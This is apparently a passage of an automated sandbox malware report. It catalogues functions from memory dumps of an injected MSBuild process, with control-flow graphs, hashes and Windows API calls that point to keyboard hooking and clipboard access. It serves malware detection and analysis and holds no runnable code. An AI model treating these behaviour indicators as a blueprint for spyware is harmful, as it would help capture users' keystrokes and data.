                                                                  control_flow_graph 1795 23234b80-23234ba4 1800 23234ba6-23234ba9 1795->1800 1801 23235288-2323528b 1800->1801 1802 23234baf-23234ca7 1800->1802 1803 2323528d-232352a7 1801->1803 1804 232352ac-232352ae 1801->1804 1823 23234d2a-23234d31 1802->1823 1824 23234cad-23234cfa call 23235438 1802->1824 1803->1804 1805 232352b0 1804->1805 1806 232352b5-232352b8 1804->1806 1805->1806 1806->1800 1809 232352be-232352cb 1806->1809 1825 23234d37-23234da7 1823->1825 1826 23234db5-23234dbe 1823->1826 1837 23234d00-23234d1c 1824->1837 1843 23234db2 1825->1843 1844 23234da9 1825->1844 1826->1809 1841 23234d27-23234d28 1837->1841 1842 23234d1e 1837->1842 1841->1823 1842->1841 1843->1826 1844->1843
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `>{"$`>{"
                                                                  • API String ID: 0-3055526701
                                                                  • Opcode ID: 4dbedbcb7e22a0ca502bf838532ef0da71a4d8290c087f634af1ced666d13a92
                                                                  • Instruction ID: 17340e884f40ba7d4be3ed9873b8dd99a79ac918a2c5aa1590bb0197877fc601
                                                                  • Opcode Fuzzy Hash: 4dbedbcb7e22a0ca502bf838532ef0da71a4d8290c087f634af1ced666d13a92
                                                                  • Instruction Fuzzy Hash: 3B619374F00208DFEB549BA4C854BAEBBF6EF89700F208569E509EB395DB754D41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230368 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2040 4230368-4230396 2042 4230398-42303d8 2040->2042 2043 42303df-42303e3 call 4230430 2040->2043 2042->2043 2045 42303e9-42303eb 2043->2045 2046 4230427-423042c 2045->2046 2047 42303ed-423041f 2045->2047 2047->2046
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pn#$x#1#
                                                                  • API String ID: 0-2444507616
                                                                  • Opcode ID: 71d329c170f79bf387bee4f300502a0156aa4a4a7d0336f70b77c704fee5e14a
                                                                  • Instruction ID: 7489b50c61a77b73a4e38afc44f591eff5601779778fbfcc67397e87eabea225
                                                                  • Opcode Fuzzy Hash: 71d329c170f79bf387bee4f300502a0156aa4a4a7d0336f70b77c704fee5e14a
                                                                  • Instruction Fuzzy Hash: 9211DC707113068FD3199F74D89066A77B6FB857047208A6DC15A9B291DF359D06CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230378 Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2056 4230378-4230396 2058 4230398-42303d8 2056->2058 2059 42303df-42303e3 call 4230430 2056->2059 2058->2059 2061 42303e9-42303eb 2059->2061 2062 4230427-423042c 2061->2062 2063 42303ed-423041f 2061->2063 2063->2062
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pn#$x#1#
                                                                  • API String ID: 0-2444507616
                                                                  • Opcode ID: c66873613829d8d1f134b93f132fd012da590c76883a1d33514bbfa5f1a9af74
                                                                  • Instruction ID: 4090138de08239a38785b3d8f781a9a5467a13736d0b783922b068b61c85585f
                                                                  • Opcode Fuzzy Hash: c66873613829d8d1f134b93f132fd012da590c76883a1d33514bbfa5f1a9af74
                                                                  • Instruction Fuzzy Hash: AD11BF7031130ACFD318AF69D890A6AB7FAFB857547208A3CD11A9B384DF35AD05CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00ABED50 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2587147504.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_ab0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6574e8e204f3d752564ef17fcd99b563ae9654deb8704dcf250cb927d96a6ed0
                                                                  • Instruction ID: bae2098f791a105f0e77b62af5363c71b4353e8d7cf57e0ff1d7866e677f4833
                                                                  • Opcode Fuzzy Hash: 6574e8e204f3d752564ef17fcd99b563ae9654deb8704dcf250cb927d96a6ed0
                                                                  • Instruction Fuzzy Hash: 6B412572D143599FDB04DF79D8047DEBBF9AF89310F14856AD404A7241DBB89884CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23225EAE Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 23225FCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 463eaf76c08bd8024b1998e4e8a76210f4874c52f1abe7380f8517517c3dad61
                                                                  • Instruction ID: da244c53bc239910b7c6ec41679e7e72432892fe896321a577b8f42fba19d676
                                                                  • Opcode Fuzzy Hash: 463eaf76c08bd8024b1998e4e8a76210f4874c52f1abe7380f8517517c3dad61
                                                                  • Instruction Fuzzy Hash: 4E51C2B1C107499FDB14CFAAC884ADEFFB5BF48310F24816AE819AB210D7759985CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23225EB8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 23225FCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: cd37e8350dd07cc1df8226a5deb2e4579033eac10208c454d13781d79e53159e
                                                                  • Instruction ID: 8480118fb245475f06175f95b4fda98d546619b3e518540568dab3a4e71ffb0c
                                                                  • Opcode Fuzzy Hash: cd37e8350dd07cc1df8226a5deb2e4579033eac10208c454d13781d79e53159e
                                                                  • Instruction Fuzzy Hash: DB41B2B1D107499FDB14DFAAC884ADEFFB5BF48310F24812AE819AB210D7749985CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2322974C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 2322ABD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 6731244e590ed04767e3868466b688c3a04f04bcbdd5a3a12825532863cbfd72
                                                                  • Instruction ID: 15301e3c54315d4ac4077e3eeee745a9b50f08732709f879158790e7bfa4ad14
                                                                  • Opcode Fuzzy Hash: 6731244e590ed04767e3868466b688c3a04f04bcbdd5a3a12825532863cbfd72
                                                                  • Instruction Fuzzy Hash: BD413BB4910745CFDB04CF99C884A9ABBF6FB98314F24C499E519AB721D774A881CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232299F4 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard
                                                                  • String ID:
                                                                  • API String ID: 220874293-0
                                                                  • Opcode ID: 86d93e89389a321296be7fe418ed888435e27ce942e2c2c38864f3d170740e24
                                                                  • Instruction ID: c892e6b413100413bad320e679b9f2a319d752726b5de83f195f86240d8e0bae
                                                                  • Opcode Fuzzy Hash: 86d93e89389a321296be7fe418ed888435e27ce942e2c2c38864f3d170740e24
                                                                  • Instruction Fuzzy Hash: B33102B0D1164DDFDB10DFAAC984BCEBBF5EB48314F248059E408AB290D7B56885CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2322B855 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard
                                                                  • String ID:
                                                                  • API String ID: 220874293-0
                                                                  • Opcode ID: a21a0d486a46e8cc394c28aecb41939ec27abbf8b92ace27c1bd8d4c8239cdb6
                                                                  • Instruction ID: 0ae40c7acb7301360ec07f8357ec12a3e6933ada426fe70fd8f55e50e9d1e2de
                                                                  • Opcode Fuzzy Hash: a21a0d486a46e8cc394c28aecb41939ec27abbf8b92ace27c1bd8d4c8239cdb6
                                                                  • Instruction Fuzzy Hash: DF3122B0D11609DFDB10DFAAD980BCDBBF1EB48314F248059E408AB290CB756985CF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23229C78 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 23229D07
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 4d83ab2a86159d5d17ac9f3aff2045d4b743eb5965d0cd6d1bd2263dbc220b7d
                                                                  • Instruction ID: 6844b98d6032c77d3304ee2c0166e2298804b712d13f63a14d0a35338210f14f
                                                                  • Opcode Fuzzy Hash: 4d83ab2a86159d5d17ac9f3aff2045d4b743eb5965d0cd6d1bd2263dbc220b7d
                                                                  • Instruction Fuzzy Hash: B721E3B59106499FDB10CFAAD884AEEFFF5FB48310F24805AE918A3310C378A950CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23229C80 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 23229D07
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 3ac33331a34848a0ca6c9c63368ee5329993ae1ae8ab3a0a3807f089b9c65571
                                                                  • Instruction ID: 5f30bffe5ccea490d7daf695068041ab2377d708581b7079755b2a4726427069
                                                                  • Opcode Fuzzy Hash: 3ac33331a34848a0ca6c9c63368ee5329993ae1ae8ab3a0a3807f089b9c65571
                                                                  • Instruction Fuzzy Hash: 6A21D5B59102499FDB10DFAAD884ADEFFF5FB48310F14841AE918A3310D378A950CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2322D389 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,2322D1F8,00000000,00000000), ref: 2322D40B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 6b1355b37c08fddc06cf2282e294e91927b7986eb795b95bc03676bb2d479cfe
                                                                  • Instruction ID: b383096006fc49f73006b11669d911ac4c451c38afd024886a43428590636084
                                                                  • Opcode Fuzzy Hash: 6b1355b37c08fddc06cf2282e294e91927b7986eb795b95bc03676bb2d479cfe
                                                                  • Instruction Fuzzy Hash: FD2115B19006099FDB14DFAAD844BEEFBF1FF88310F14842AE429A7250C7786941CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00ABEE20 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00ABEE8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2587147504.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_ab0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 4ceccb6894584c51187dd7b39a86c9980c80800ed7ce7a6eeaa9300223b0fd49
                                                                  • Instruction ID: 3717f6bd69fe0d9334660b53056cc43c7110fe92a17eefc9b7956b87be4d52f0
                                                                  • Opcode Fuzzy Hash: 4ceccb6894584c51187dd7b39a86c9980c80800ed7ce7a6eeaa9300223b0fd49
                                                                  • Instruction Fuzzy Hash: 681112B1C106599FDB10DFAAC444BDEFBF8AF48320F15812AE818A7241D778A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23223FD0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 23224E76
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 55f881260f68eae928995813aee6dd9308058da1cab1e4ef98c00fbb3f4e111b
                                                                  • Instruction ID: a74ba3e9c5831c2d5f225c97756b3989df67a7847aced482e288063608f6397c
                                                                  • Opcode Fuzzy Hash: 55f881260f68eae928995813aee6dd9308058da1cab1e4ef98c00fbb3f4e111b
                                                                  • Instruction Fuzzy Hash: 191102B6D006498FDB10DF9AC844BDEFBF4EB89224F10846AD929B7210C379A545CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23224E0A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 23224E76
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 5a9d7651ece901145f4bdabb6c224c315072a04c25b11355b632b5c653f08a74
                                                                  • Instruction ID: fb4ac52c8c3711423dd2583361d075ec5fd83aa3cc1be6331c132f2dbb5d8451
                                                                  • Opcode Fuzzy Hash: 5a9d7651ece901145f4bdabb6c224c315072a04c25b11355b632b5c653f08a74
                                                                  • Instruction Fuzzy Hash: 30113FB6D006498FDB10DF9AC840BDEFBF4EB88220F10805AD829A7210C378A545CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2322B311 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 2322B36D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: 17f17e96df7591699cf8406e92801e4086a1c39273e96c60862e0a81c67d2161
                                                                  • Instruction ID: 6878a2ea891b5dc6abca9647d9f5ce87753693d38bfa0fabb4c849a13a8bed63
                                                                  • Opcode Fuzzy Hash: 17f17e96df7591699cf8406e92801e4086a1c39273e96c60862e0a81c67d2161
                                                                  • Instruction Fuzzy Hash: C21133B18006498FDB10DFAAC844BCEFFF8EB48220F24845AE519A7210C378A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232297A4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,2322AE25), ref: 2322AEAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 3442b36cc10e3faa4d5bd6f58d781c88ba0054c4400143f70e20262a4bcbe473
                                                                  • Instruction ID: c29f274cd6fdbeb178ba3e72842960491d22ccc129c64ab366120e8f81dc7568
                                                                  • Opcode Fuzzy Hash: 3442b36cc10e3faa4d5bd6f58d781c88ba0054c4400143f70e20262a4bcbe473
                                                                  • Instruction Fuzzy Hash: 1D1103B58106498FDB10DF9AD884BDEFBF4EB48324F20846AE519A7610C778A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232299DC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 2322B36D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: 67e457fdd533ce53ebc38e21b21318118afd55f68c7ede5abf329bfd319ea008
                                                                  • Instruction ID: 46bd39309cc54d106126dd5d09799d7afd20b65124fd298ae3cce1ac942a1ec8
                                                                  • Opcode Fuzzy Hash: 67e457fdd533ce53ebc38e21b21318118afd55f68c7ede5abf329bfd319ea008
                                                                  • Instruction Fuzzy Hash: A71103B18107488FDB10DFAAD844BDEBBF4EB48220F208459E519A7310C3B8A940CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2322AE52 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,2322AE25), ref: 2322AEAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 6dd6470f7f170798ab0215a6c539522bb4abc732b4c5906613f76270b7a23eb2
                                                                  • Instruction ID: 9f45322724737bf9c3568ff12d54a75b6a03da3f7fe453791354323248a3feea
                                                                  • Opcode Fuzzy Hash: 6dd6470f7f170798ab0215a6c539522bb4abc732b4c5906613f76270b7a23eb2
                                                                  • Instruction Fuzzy Hash: 5B11F3B5C006498FDB10DF9AD884BDEFFF4EB48324F20845AD519A7650C778A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232345D4 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: H={"
                                                                  • API String ID: 0-1258043604
                                                                  • Opcode ID: 216f2701be89157ee149d27e07ff0efba35cbd3cfb083789136733ffb27fafe3
                                                                  • Instruction ID: 41c0f69e9cef92fba3f7ce2cbd60a2032cc9e3058298d52f828cbd17ebd54add
                                                                  • Opcode Fuzzy Hash: 216f2701be89157ee149d27e07ff0efba35cbd3cfb083789136733ffb27fafe3
                                                                  • Instruction Fuzzy Hash: B1913070E002198FDB10DF68CC50B8DB7B5FF8A310F248699D549BB291DB74AA85CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232345E8 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: H={"
                                                                  • API String ID: 0-1258043604
                                                                  • Opcode ID: 8ab20098860ee908a294e2e7bf03364852c47f0e26ad5eb28cc8e2e005866e4a
                                                                  • Instruction ID: 5eee5676869750f771c4c85c1f36fec3ac9df77f2d6d24cd3eb6d61041448d05
                                                                  • Opcode Fuzzy Hash: 8ab20098860ee908a294e2e7bf03364852c47f0e26ad5eb28cc8e2e005866e4a
                                                                  • Instruction Fuzzy Hash: 22912C74E002198BDB50DF68C890B8DB7B5FF8A310F208699D549BB391DB70AA85CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23234B71 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `>{"
                                                                  • API String ID: 0-758907228
                                                                  • Opcode ID: e3a45151a61f91eed67f9612b0ab60eb8338759616c5726651897d21134a2d4d
                                                                  • Instruction ID: bcef455a503bce20756e4810cc659bd44a1798395021731461ddfeb4381912d5
                                                                  • Opcode Fuzzy Hash: e3a45151a61f91eed67f9612b0ab60eb8338759616c5726651897d21134a2d4d
                                                                  • Instruction Fuzzy Hash: 72515A70B002089FEB449BA9C854B9EBBF6EF89700F21856AE505AB395DA749D418B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231EB1 Relevance: .4, Instructions: 441COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5eaf60a0675f47b1b6823c283fbe755afaf7547c1d53400883b0a76da970f9b8
                                                                  • Instruction ID: b3182c3336d60186ee844af8cddc97829366869650ce2e6cf44c021ee83583ad
                                                                  • Opcode Fuzzy Hash: 5eaf60a0675f47b1b6823c283fbe755afaf7547c1d53400883b0a76da970f9b8
                                                                  • Instruction Fuzzy Hash: 1B415C70A10709DFCB14DFA9C85469DBBB1EF89300F14C659E8497B265EB70A981CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04232150 Relevance: .3, Instructions: 341COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e54e2697c78dc29a4571ca645364752c2eecaa0ccd347a9f876ea89ac653f75
                                                                  • Instruction ID: dd36073a905c26a8bfc2ee800db11008612fedba1a070dac056713b2ae79f751
                                                                  • Opcode Fuzzy Hash: 2e54e2697c78dc29a4571ca645364752c2eecaa0ccd347a9f876ea89ac653f75
                                                                  • Instruction Fuzzy Hash: 3DD18F71E10309DFDB18DFA9C8547AEBBF2AF88310F148599D405AB391DB74AD41CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23234DC3 Relevance: .3, Instructions: 334COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af78914c96db5cb935ea266e4f2be305022ae35c7e7edd784f5ec6ec161f475f
                                                                  • Instruction ID: d0a9b0ddb1065c6a2cb698fa4bb9e280bb66be8f58d1d47e522868dceeeb45af
                                                                  • Opcode Fuzzy Hash: af78914c96db5cb935ea266e4f2be305022ae35c7e7edd784f5ec6ec161f475f
                                                                  • Instruction Fuzzy Hash: E3D16D70B00218DFEB54DFA8C855B6D7BF6FF88700F2081A9E509AB3A5CB759D458B80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23236200 Relevance: .2, Instructions: 229COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb9e6b7abf88ae901369e65c1fb042797606e4be52e95861a9d763571e1c4c4c
                                                                  • Instruction ID: d8c41e90b93068bf076db3a44e02a5322f35fa5dd0349a68a2e91651cf9fbd63
